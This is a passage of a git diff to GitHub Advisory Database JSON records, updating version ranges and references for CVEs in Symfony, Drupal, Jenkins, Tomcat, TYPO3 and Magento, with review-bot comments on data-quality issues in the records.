"package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.0.11" + } + ] + } + ] } ], "references": [ @@ -128,6 +318,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/fad1e1f2ea336e85c889feece9d0e23fbfcf777d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2018-11385.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2018-11385.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2018-11385.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/symfony" @@ -152,6 +354,10 @@ "type": "WEB", "url": "https://symfony.com/blog/cve-2018-11385-session-fixation-issue-for-guard-authentication" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2018-11385" + }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4262" diff --git a/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json b/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json index 66c1d7ac62ded..54b907d143524 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json +++ b/advisories/github-reviewed/2022/05/GHSA-g78h-pf65-46rv/GHSA-g78h-pf65-46rv.json @@ -15,6 +15,44 @@ } ], "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.5.0" + }, + { + "fixed": "8.5.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ckeditor-dev" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.10" + }, + { + "fixed": "4.9.2" + } + ] + } + ] + }, { "package": { "ecosystem": "Packagist", 
@@ -37,17 +75,17 @@ { "package": { "ecosystem": "Packagist", - "name": "drupal/core" + "name": "drupal/drupal" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "8.5.0" + "introduced": "8.0" }, { - "fixed": "8.5.2" + "fixed": "8.4.7" } ] } @@ -55,18 +93,18 @@ }, { "package": { - "ecosystem": "npm", - "name": "ckeditor-dev" + "ecosystem": "Packagist", + "name": "drupal/drupal" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "4.5.10" + "introduced": "8.5" }, { - "fixed": "4.9.2" + "fixed": "8.5.2" } ] } @@ -78,6 +116,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-9861" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2018-9861.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2018-9861.yaml" + }, { "type": "WEB", "url": "https://github.com/ckeditor/ckeditor-dev/blob/master/CHANGES.md" diff --git a/advisories/github-reviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json b/advisories/github-reviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json new file mode 100644 index 0000000000000..8bbfc15e19a0c --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json 
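Review bot: The `drupal/drupal` ranges introduced in the second and third hunks use two-component versions (`"introduced": "8.0"`, `"introduced": "8.5"`), while the `drupal/core` entry in the same `affected` array uses the three-component `"8.5.0"`; Composer normalizes both forms, but mixing them in one file invites inconsistent comparisons in downstream tooling, so `"introduced": "8.0.0"` and `"introduced": "8.5.0"` would be the consistent spelling. It is also worth checking whether `drupal/core` needs a matching 8.0.0–8.4.7 range: `drupal/drupal` now covers both the 8.4.x and 8.5.x branches but `drupal/core` only the 8.5.x one, and nothing visible in these hunks explains the asymmetry.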
@@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7cf-wg27-qw87", + "modified": "2024-01-30T23:17:03Z", + "published": "2022-05-17T00:50:18Z", + "aliases": [ + "CVE-2014-9634" + ], + "summary": "Jenkins secure flag not set on session cookies", + "details": "Jenkins before 1.586 does not set the secure flag on session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to capture cookies by intercepting their transmission within an HTTP session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.586" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9634" + }, + { + "type": "WEB", + "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185148" + }, + { + "type": "WEB", + "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" + }, + { + "type": "WEB", + "url": "https://jenkins.io/changelog-old/" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/72054" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:17:03Z", + "nvd_published_at": "2017-09-12T14:29:00Z" + } +} \ No newline at end of file 
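Review bot: The new advisory leaves `cwe_ids` as an empty array even though the details state the weakness precisely (session cookie issued without the Secure flag), and the sibling records added in this commit all carry a CWE. CWE-614 (Sensitive Cookie in HTTPS Session Without 'Secure' Attribute) is the usual classification for this; if the curator agrees, `"cwe_ids": ["CWE-614"]` keeps the record queryable by weakness like the rest of the database.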
diff --git a/advisories/github-reviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json b/advisories/github-reviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json new file mode 100644 index 0000000000000..bb3256cddefd5 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json 
@@ -0,0 +1,131 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g857-p997-wx7w", + "modified": "2024-02-08T21:35:25Z", + "published": "2022-05-02T03:46:56Z", + "aliases": [ + "CVE-2009-3629" + ], + "summary": "TYPO3 Backend vulnerable to Cross-site Scripting", + "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "4.0.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.1.0" + }, + { + "fixed": "4.1.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3alpha1" + }, + { + "fixed": "4.3beta2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3629" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53918" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101223093042/http://www.securityfocus.com/bid/36801" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" + }, + { + "type": "WEB", + "url": 
"http://marc.info/?l=oss-security&m=125633199111438&w=2" + }, + { + "type": "WEB", + "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:35:25Z", + "nvd_published_at": "2009-11-02T15:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json b/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json index 3875c91426db4..9b5326cfb6bde 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json +++ b/advisories/github-reviewed/2022/05/GHSA-g888-g2pp-82hf/GHSA-g888-g2pp-82hf.json @@ -28,7 +28,45 @@ "introduced": "0" }, { - "fixed": "1.15.4" + "fixed": "1.10.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "simplesamlphp/saml2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0" + }, + { + "fixed": "2.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "simplesamlphp/saml2" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0" + }, + { + "fixed": "3.1.4" } ] } @@ -44,6 +82,10 @@ "type": "WEB", "url": "https://github.com/simplesamlphp/saml2/commit/4f6af7f69f29df8555a18b9bb7b646906b45924d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/saml2/CVE-2018-7711.yaml" + }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00017.html" diff --git a/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json b/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json index 39f267ec97b9d..c0942d42ccad6 100644 --- a/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json 
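Review bot: All four affected ranges in GHSA-g857-p997-wx7w are attached to `typo3/cms-backend`, yet they describe TYPO3 4.0–4.3 releases; the split `typo3/cms-*` Composer packages were presumably published well after the 4.x line, so these ranges may never match a version that actually exists on Packagist, which would make the advisory unmatchable in practice. Please confirm which versions are published under that package name, or re-home the ranges to whichever package those releases were distributed under. Note also that the `severity` array is empty while `database_specific.severity` is `LOW`; that is acceptable when no CVSS vector exists, but it should be a deliberate choice rather than an accidental gap.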
+++ b/advisories/github-reviewed/2022/05/GHSA-g97c-jfx6-xvxh/GHSA-g97c-jfx6-xvxh.json @@ -41,7 +41,45 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.6.0" + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/form" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" }, { "fixed": "2.6.12" @@ -53,7 +91,7 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/symfony" + "name": "symfony/form" }, "ranges": [ { 
@@ -68,6 +106,120 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security-http" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.3.0" + }, + { + "fixed": "2.3.35" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/security" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.7.0" + }, + { + "fixed": "2.7.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.4.0" + }, + { + "fixed": "2.6.12" + } + ] + } + ] } ], "references": [ 
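Review bot: In this hunk `symfony/symfony` receives only the 2.4.0–2.6.12 range, while `symfony/security` (and `symfony/form` in the preceding hunk) also get the 2.3.0–2.3.35 and 2.7.0–2.7.7 branches; since the preceding hunk renames the previously visible `symfony/symfony` entry to `symfony/form`, the monolith package may have lost its 2.3.x and 2.7.x coverage for CVE-2015-8125. If no other `symfony/symfony` entries remain earlier in the `affected` array, two more entries with `"introduced": "2.3.0"`/`"fixed": "2.3.35"` and `"introduced": "2.7.0"`/`"fixed": "2.7.7"` are needed. The missing 2.3.x range for `symfony/security-http` is presumably intentional, as the sub-packages only appeared with the 2.4 component split.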
@@ -79,10 +231,30 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/pull/16630" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/form/CVE-2015-8125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2015-8125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2015-8125.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2015-8125.yaml" + }, { "type": "WEB", "url": "https://symfony.com/blog/cve-2015-8125-potential-remote-timing-attack-vulnerability-in-security-remember-me-service" }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2015-8125" + }, { "type": "WEB", "url": "https://web.archive.org/web/20200228050051/http://www.securityfocus.com/bid/77692" @@ -98,6 +270,10 @@ { "type": "WEB", "url": "http://www.debian.org/security/2015/dsa-3402" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/77692" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json b/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json index 693344f5f0ddc..30e7876793bd2 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json +++ b/advisories/github-reviewed/2022/05/GHSA-gfcq-wh3g-c6h4/GHSA-gfcq-wh3g-c6h4.json 
@@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8110" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8110.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json b/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json index 0e9b03a12b7c6..273d92c78eefd 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json +++ b/advisories/github-reviewed/2022/05/GHSA-gg96-8w9x-7rx9/GHSA-gg96-8w9x-7rx9.json @@ -78,6 +78,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7921" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-7921.yaml" + }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051916/https://magento.com/security/patches/magento-2.3.2-2.2.9-and-2.1.18-security-update-23" diff --git a/advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json b/advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json new file mode 100644 index 0000000000000..d2e338d1578c9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json 
@@ -0,0 +1,209 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ggx9-4728-588r", + "modified": "2024-02-08T21:29:22Z", + "published": "2022-05-02T03:37:48Z", + "aliases": [ + "CVE-2009-2693" + ], + "summary": "Apache Tomcat Directory Traversal vulnerability", + "details": "Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a `..` (dot dot) in an entry in a WAR file, as demonstrated by a `../../bin/catalina.bat` entry.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.5.0" + }, + { + "last_affected": "5.5.28" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.tomcat:tomcat" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "last_affected": "6.0.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2693" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55855" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/tomcat" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E" + }, + { + "type": "WEB", + "url": 
"https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19355" + }, + { + "type": "WEB", + "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7017" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229071135/http://www.securityfocus.com/bid/37944" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200516121700/http://www.securityfocus.com/archive/1/516397/100/0/threaded" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20201206235536/http://www.securityfocus.com/archive/1/509148/100/0/threaded" + }, + { + "type": "WEB", + "url": "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02241113" + }, + { + "type": "WEB", + "url": "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2010-04/msg00001.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00089.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00090.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-updates/2013-01/msg00037.html" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=127420533226623&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=133469267822771&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=136485229118404&w=2" + }, + { + "type": "WEB", + "url": "http://marc.info/?l=bugtraq&m=139344343412337&w=2" + }, + { + "type": "WEB", + "url": "http://support.apple.com/kb/HT4077" + }, + { + "type": "WEB", + "url": "http://svn.apache.org/viewvc?rev=892815&view=rev" + }, + { + "type": "WEB", + "url": "http://svn.apache.org/viewvc?rev=902650&view=rev" + }, + { + "type": "WEB", + "url": "http://tomcat.apache.org/security-5.html" + }, + { + "type": "WEB", + "url": 
"http://tomcat.apache.org/security-6.html" + }, + { + "type": "WEB", + "url": "http://ubuntu.com/usn/usn-899-1" + }, + { + "type": "WEB", + "url": "http://www.debian.org/security/2011/dsa-2207" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:176" + }, + { + "type": "WEB", + "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:177" + }, + { + "type": "WEB", + "url": "http://www.redhat.com/support/errata/RHSA-2010-0119.html" + }, + { + "type": "WEB", + "url": "http://www.redhat.com/support/errata/RHSA-2010-0580.html" + }, + { + "type": "WEB", + "url": "http://www.redhat.com/support/errata/RHSA-2010-0582.html" + }, + { + "type": "WEB", + "url": "http://www.vmware.com/security/advisories/VMSA-2011-0003.html" + }, + { + "type": "WEB", + "url": "http://www.vmware.com/support/vsphere4/doc/vsp_vc41_u1_rel_notes.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T21:29:22Z", + "nvd_published_at": "2010-01-28T20:30:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json b/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json index 43f7833ca5dd1..65d3e657b4352 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json +++ b/advisories/github-reviewed/2022/05/GHSA-gjjm-4x3g-3h33/GHSA-gjjm-4x3g-3h33.json 
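Review bot: Both `events` arrays in the new GHSA-ggx9-4728-588r end with `last_affected` (`5.5.28`, `6.0.20`) instead of `fixed`, so matching tools will treat every release after those versions as clean even if a later release shipped before the actual fix. The referenced `http://tomcat.apache.org/security-5.html` and `security-6.html` pages state which releases fixed this CVE; prefer `{ "fixed": "<fix release per security-5/6.html>" }` for each branch and keep `last_affected` only where no fixed release exists. Separately, `"severity": [ ]` is empty while `database_specific.severity` is `MODERATE`; if no CVSS vector is available for a 2009 CVE that is acceptable, but it is worth confirming rather than inheriting an empty array.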
@@ -59,10 +59,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8139" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/magento/product-community-edition/CVE-2019-8139.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/magento/magento2" }, + { + "type": "WEB", + "url": "https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" + }, { "type": "WEB", "url": "https://web.archive.org/web/20220121051105/https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update" diff --git a/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json b/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json index 5dc4732bfd1ae..49ba86915c362 100644 --- a/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json +++ b/advisories/github-reviewed/2022/05/GHSA-gm5x-hpmw-xpxg/GHSA-gm5x-hpmw-xpxg.json @@ -33,6 +33,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "silverstripe/framework" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.5.4" + } + ] + } + ] } ], "references": [ @@ -40,6 +78,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-6164" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2020-6164.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/silverstripe/silverstripe-cms" 
@@ -47,6 +89,10 @@ { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/CVE-2020-6164" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2020-6164/" } ], "database_specific": { diff --git a/advisories/github-reviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json b/advisories/github-reviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json new file mode 100644 index 0000000000000..40fee8e9567c8 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gpmw-h4wq-4rch/GHSA-gpmw-h4wq-4rch.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gpmw-h4wq-4rch", + "modified": "2024-01-30T21:18:51Z", + "published": "2022-05-24T16:56:45Z", + "aliases": [ + "CVE-2019-10409" + ], + "summary": "Missing permission check in Jenkins Project Inheritance Plugin", + "details": "A missing permission check in Jenkins Project Inheritance Plugin 19.08.01 and earlier allowed attackers with Overall/Read permission to trigger project generation from templates.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins:project-inheritance" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.08.02" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10409" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-09-25/#SECURITY-401" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/09/25/3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:18:51Z", + "nvd_published_at": "2019-09-25T16:15:00Z" + } +} \ No newline at end of file 
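Review bot: The added reference `https://www.silverstripe.org/download/security-releases/cve-2020-6164/` differs from the existing context line `https://www.silverstripe.org/download/security-releases/CVE-2020-6164` only by letter case and a trailing slash, so it is most likely the same page recorded twice. Keep whichever form the vendor canonically serves and drop the other; duplicate references differing only in normalisation tend to accumulate with every re-import.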
diff --git a/advisories/github-reviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json b/advisories/github-reviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json new file mode 100644 index 0000000000000..517a3865d4d42 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-gvhp-v4m2-3rwf/GHSA-gvhp-v4m2-3rwf.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvhp-v4m2-3rwf", + "modified": "2024-01-30T21:09:20Z", + "published": "2022-05-13T01:15:02Z", + "aliases": [ + "CVE-2019-10277" + ], + "summary": "Jenkins StarTeam Plugin stores credentials in plain text ", + "details": "Jenkins StarTeam Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "hudson.plugins:starteam" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + 